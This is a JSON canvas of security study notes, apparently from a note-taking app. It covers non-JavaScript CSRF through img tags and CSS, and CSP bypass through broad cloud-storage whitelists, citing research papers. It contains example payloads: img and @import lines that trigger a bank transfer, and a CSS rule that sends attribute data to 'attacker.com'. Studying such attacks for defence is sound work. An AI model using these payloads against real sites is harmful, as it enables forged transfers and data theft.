{
  "edges": [
  ],
  "nodes": [
    {
      "height": 680,
      "id": "22b8ea6daf0559d5",
      "styleAttributes": {
      },
      "text": "If a server does not check the HTTP method used, CSRF can be technically executed with a GET request that is implicitly executed with:\n\n  `<img>` or `<a>` tags \n\n```html\n<img src=\"https://banca.com/transfer?amount=5000&to_account=123456\">\n```\n\nCSS rules and custom attributes\n\n```CSS\n/* it will execute a GET request with dynamic parameters */\ndiv[secret-data] {\n    background-image: url(\"https://attacker.com/log?data=\"attr(secret-data));\n}\n\n```\n\nUsing the CSS `@import` statement\n```css\n\n@import url(\"https://banca.com/transfer?amount=5000&to_account=123456\");\n\n```\n",
      "type": "text",
      "width": 1020,
      "x": 500,
      "y": 400
    },
    {
      "height": 120,
      "id": "726008afe859bd11",
      "styleAttributes": {
      },
      "text": "### Non-JS based CSRF [[(Maes, Heyman, et al., 2009)]], [[(Felsch, Heiderich, et al., 2015)]]",
      "type": "text",
      "width": 1020,
      "x": 500,
      "y": 240
    },
    {
      "height": 80,
      "id": "472594e7924f8fc8",
      "styleAttributes": {
      },
      "text": "### XSS driven by cloud object storage [[(Lv, Shi, et al., 2023)]]",
      "type": "text",
      "width": 960,
      "x": 500,
      "y": -680
    },
    {
      "height": 400,
      "id": "370cd5d8f930cf77",
      "styleAttributes": {
      },
      "text": "[[CSP (Content Security Policy)]] may be bypassed if the whitelisted cross-domain is too general. This is often the case with Cloud [[object storage service]]: for example, Google Cloud, and Amazon AWS\n- developers often indicate a general domain `storage.googleapis.com`, in the HTTP header, ==trusting Google sources==\n- an attacker can upload a malicious script in Google Cloud, which share the `storage.googleapis.com` root domain\n- in case of XSS attack the CSP will not block the execution of the malicious script because the domain is considered legitimate\n",
      "type": "text",
      "width": 960,
      "x": 500,
      "y": -560
    }
  ]
}